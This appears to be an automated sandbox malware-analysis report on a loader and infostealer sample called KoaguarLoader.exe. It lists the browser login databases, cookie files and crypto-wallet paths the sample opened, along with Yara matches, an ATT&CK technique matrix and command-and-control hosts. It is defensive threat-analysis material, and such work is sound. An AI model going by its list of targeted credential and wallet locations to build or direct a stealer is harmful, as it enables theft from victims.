                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bocpokimicclpaiekenaeelehdjllofo
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pocmplpaccanhmnllbbkpgfliimjljgo
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hmeobnfnfcmdkdcmlblgagmfpfboieaf
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\kz8kl7vh.default\cookies.sqlite
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jblndlipeogpafnldhgmapagcccfchpi
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\Profiles
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pnlfjmlcjdjgkddecgincndfgegkecke
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\agoakfejjabomempkjlepdflaleeobhb
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
                        Source: Yara matchFile source: 2.2.KoaguarLoader.exe.e80000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 16.2.HkqNfKUrMBAD.exe.6e0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.I1y524I4zau1n3u.exe.290000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.I1y524I4zau1n3u.exe.290000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.HkqNfKUrMBAD.exe.6e0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000017.00000001.1289075938.0000000000291000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000002.939032080.0000000000E81000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.1079600336.00000000006E1000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.943416104.0000000000291000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.2129024902.0000000000291000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000010.00000002.1215210538.00000000006E1000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: KoaguarLoader.exe PID: 5744, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: I1y524I4zau1n3u.exe PID: 3816, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: HkqNfKUrMBAD.exe PID: 7336, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: I1y524I4zau1n3u.exe PID: 7616, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: I1y524I4zau1n3u.exe PID: 5908, type: MEMORYSTR

                        Remote Access Functionality

Source: Yara match; File source: 2.2.KoaguarLoader.exe.e80000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 16.2.HkqNfKUrMBAD.exe.6e0000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 12.2.I1y524I4zau1n3u.exe.290000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 4.2.I1y524I4zau1n3u.exe.290000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 9.2.HkqNfKUrMBAD.exe.6e0000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000010.00000002.1215210538.0000000000EDD000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.939032080.000000000167D000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match; File source: 0000000C.00000002.2129024902.0000000000A8D000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.1079600336.0000000000EDD000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.943416104.0000000000A8D000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: KoaguarLoader.exe PID: 5744, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: I1y524I4zau1n3u.exe PID: 3816, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: HkqNfKUrMBAD.exe PID: 7336, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: I1y524I4zau1n3u.exe PID: 7616, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: HkqNfKUrMBAD.exe PID: 7956, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: svhost.exe PID: 5248, type: MEMORYSTR
Source: Yara match; File source: sslproxydump.pcap, type: PCAP
Source: Yara match; File source: KoaguarLoader.exe, type: SAMPLE
Source: Yara match; File source: 3.2.svhost.exe.31e05f0.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.3.KoaguarLoader.exe.a5f010.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.2.svhost.exe.31e05f0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.0.KoaguarLoader.exe.727e94.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.0.KoaguarLoader.exe.727e94.2.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.0.svhost.exe.f00000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.3.KoaguarLoader.exe.a5f010.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.0.KoaguarLoader.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.0.KoaguarLoader.exe.409294.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.0.KoaguarLoader.exe.409294.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000003.00000002.2138122248.0000000003111000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000003.877294126.0000000000A50000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000000.868675253.0000000000408000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.2138122248.00000000031DD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000000.877223219.0000000000F02000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: KoaguarLoader.exe PID: 6992, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: svhost.exe PID: 5248, type: MEMORYSTR
Source: Yara match; File source: C:\Users\user\AppData\Local\Temp\svhost.exe, type: DROPPED
Source: Yara match; File source: C:\Users\user\AppData\Roaming\svhost.exe, type: DROPPED
MITRE ATT&CK Matrix (techniques listed per tactic column; the numeric prefixes are the report's per-technique markers, kept as they appear)

Reconnaissance: Gather Victim Identity Information | Credentials | Email Addresses | Employee Names | Gather Victim Network Information | Domain Properties | DNS | Network Trust Dependencies
Resource Development: Acquire Infrastructure | Domains | DNS Server | Virtual Private Server | Server | Botnet | Web Services | Serverless
Initial Access: Valid Accounts | Default Accounts | Domain Accounts | Local Accounts | Cloud Accounts | Replication Through Removable Media | External Remote Services | Drive-by Compromise
Execution: 131 Windows Management Instrumentation | 1 PowerShell | At | Cron | Launchd | Scheduled Task | Systemd Timers | Container Orchestration Job
Persistence: 1 DLL Side-Loading | 121 Registry Run Keys / Startup Folder | Logon Script (Windows) | Login Hook | Network Logon Script | RC Scripts | Startup Items | Scheduled Task/Job
Privilege Escalation: 1 DLL Side-Loading | 12 Process Injection | 121 Registry Run Keys / Startup Folder | Login Hook | Network Logon Script | RC Scripts | Startup Items | Scheduled Task/Job
Defense Evasion: 11 Disable or Modify Tools | 1 Deobfuscate/Decode Files or Information | 12 Obfuscated Files or Information | 21 Software Packing | 1 DLL Side-Loading | 12 Masquerading | 171 Virtualization/Sandbox Evasion | 12 Process Injection
Credential Access: 1 OS Credential Dumping | 11 Input Capture | Security Account Manager | NTDS | LSA Secrets | Cached Domain Credentials | DCSync | Proc Filesystem
Discovery: 1 File and Directory Discovery | 34 System Information Discovery | 561 Security Software Discovery | 2 Process Discovery | 171 Virtualization/Sandbox Evasion | 1 Application Window Discovery | 1 System Network Configuration Discovery | System Owner/User Discovery
Lateral Movement: Remote Services | Remote Desktop Protocol | SMB/Windows Admin Shares | Distributed Component Object Model | SSH | VNC | Windows Remote Management | Cloud Services
Collection: 11 Archive Collected Data | 3 Data from Local System | 11 Input Capture | Input Capture | Keylogging | GUI Input Capture | Web Portal Capture | Credential API Hooking
Command and Control: 1 Web Service | 1 Ingress Tool Transfer | 11 Encrypted Channel | 1 Non-Standard Port | 2 Non-Application Layer Protocol | 13 Application Layer Protocol | Commonly Used Port | Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium | Exfiltration Over Bluetooth | Automated Exfiltration | Traffic Duplication | Scheduled Transfer | Data Transfer Size Limits | Exfiltration Over C2 Channel | Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features | Network Denial of Service | Data Encrypted for Impact | Data Destruction | Data Encrypted for Impact | Service Stop | Inhibit System Recovery | Defacement

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
Behavior Graph ID: 1635431 | Sample: KoaguarLoader.exe | Start date: 11/03/2025 | Architecture: WINDOWS | Score: 100

Top level (node 2):
- DNS/IP: api.telegram.org (Uses the Telegram API (likely for C&C communication)); develop-oregon.gl.at.ply.gg; ip-api.com
- Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 19 other signatures
- Started: KoaguarLoader.exe (node 9, counter 3); I1y524I4zau1n3u.exe (node 13); HkqNfKUrMBAD.exe (node 16); 4 other processes (node 18)

KoaguarLoader.exe (node 9):
- Dropped: C:\Users\user\AppData\Local\Temp\svhost.exe (PE32); C:\Users\user\AppData\...\KoaguarLoader.exe (PE32)
- Signatures: Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
- Started: svhost.exe (node 20, counters 15 5); KoaguarLoader.exe (node 25, counters 2 5)

I1y524I4zau1n3u.exe (node 13):
- DNS/IP: 104.21.84.111, 443, 54517 CLOUDFLARENETUS United States
- Signatures: Found many strings related to Crypto-Wallets (likely being stolen); Tries to harvest and steal browser information (history, passwords, etc); Tries to steal Crypto Currency Wallets

HkqNfKUrMBAD.exe (node 16):
- Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file

4 other processes (node 18):
- DNS/IP: 127.0.0.1 unknown unknown

svhost.exe (node 20):
- DNS/IP: develop-oregon.gl.at.ply.gg 147.185.221.25, 41793, 49703, 49704 SALSGIVERUS United States; ip-api.com 208.95.112.1, 49685, 80 TUT-ASUS United States; api.telegram.org 149.154.167.220, 443, 49702 TELEGRAMRU United Kingdom
- Dropped: C:\Users\user\AppData\Roaming\svhost.exe (PE32)
- Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); 5 other signatures
- Started: powershell.exe (node 27, counter 23); powershell.exe (node 30, counter 23); powershell.exe (node 32); powershell.exe (node 34)

KoaguarLoader.exe (node 25):
- DNS/IP: 172.67.191.102, 443, 50310, 60812 CLOUDFLARENETUS United States
- Dropped: C:\Users\user\AppData\...\HkqNfKUrMBAD.exe (PE32); C:\...\I1y524I4zau1n3u.exe (PE32)
- Signatures: Found many strings related to Crypto-Wallets (likely being stolen); Creates multiple autostart registry keys
- Started: I1y524I4zau1n3u.exe (node 36)

powershell.exe (node 27):
- Signatures: Loading BitLocker PowerShell Module
- Started: conhost.exe (node 38)

powershell.exe (node 30): started conhost.exe (node 40)
powershell.exe (node 32): started conhost.exe (node 42)
powershell.exe (node 34): started conhost.exe (node 44)
